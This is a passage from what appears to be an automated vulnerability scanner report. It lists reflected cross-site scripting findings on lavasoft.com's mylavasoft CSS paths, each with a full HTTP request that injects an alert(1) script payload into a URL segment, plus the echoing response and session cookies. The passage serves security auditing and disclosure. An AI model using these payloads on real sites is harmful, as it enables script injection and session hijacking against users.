User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules1ff16'><script>alert(1)</script>776fd51402b/fieldgroup/fieldgroup.css'>
...[SNIP]...

1.224. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e25ea'><script>alert(1)</script>76e833ea6be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/fieldgroupe25ea'><script>alert(1)</script>76e833ea6be/fieldgroup.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/fieldgroupe25ea'><script>alert(1)</script>76e833ea6be/fieldgroup.css'>
...[SNIP]...

1.225. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6526f'><script>alert(1)</script>a83c4abad5c was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css6526f'><script>alert(1)</script>a83c4abad5c?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18254
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css6526f'><script>alert(1)</script>a83c4abad5c'>
...[SNIP]...

1.226. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5a0d'><script>alert(1)</script>9c48b8d5610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftc5a0d'><script>alert(1)</script>9c48b8d5610/sites/all/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:26 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:26 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10657
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftc5a0d'><script>alert(1)</script>9c48b8d5610/sites/all/modules/cck/modules/filefield/filefield.css?w'>
...[SNIP]...

1.227. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4f27'><script>alert(1)</script>30edce3703c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesf4f27'><script>alert(1)</script>30edce3703c/all/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18288
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesf4f27'><script>alert(1)</script>30edce3703c/all/modules/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.228. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d427b'><script>alert(1)</script>df1388f24cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/alld427b'><script>alert(1)</script>df1388f24cc/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/alld427b'><script>alert(1)</script>df1388f24cc/modules/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.229. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9f67'><script>alert(1)</script>c9c54c00294 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modulesf9f67'><script>alert(1)</script>c9c54c00294/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modulesf9f67'><script>alert(1)</script>c9c54c00294/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.230. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3443b'><script>alert(1)</script>0d75aba846e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck3443b'><script>alert(1)</script>0d75aba846e/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck3443b'><script>alert(1)</script>0d75aba846e/modules/filefield/filefield.css'>
...[SNIP]...

1.231. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2bc2c'><script>alert(1)</script>aa458b12de5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules2bc2c'><script>alert(1)</script>aa458b12de5/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules2bc2c'><script>alert(1)</script>aa458b12de5/filefield/filefield.css'>
...[SNIP]...

1.232. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc7bf'><script>alert(1)</script>385b89604bb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/filefielddc7bf'><script>alert(1)</script>385b89604bb/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/filefielddc7bf'><script>alert(1)</script>385b89604bb/filefield.css'>
...[SNIP]...

1.233. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6771b'><script>alert(1)</script>d3895153ec4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css6771b'><script>alert(1)</script>d3895153ec4?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css6771b'><script>alert(1)</script>d3895153ec4'>
...[SNIP]...

1.234. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b10'><script>alert(1)</script>64da57a4779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft86b10'><script>alert(1)</script>64da57a4779/sites/all/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10650
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
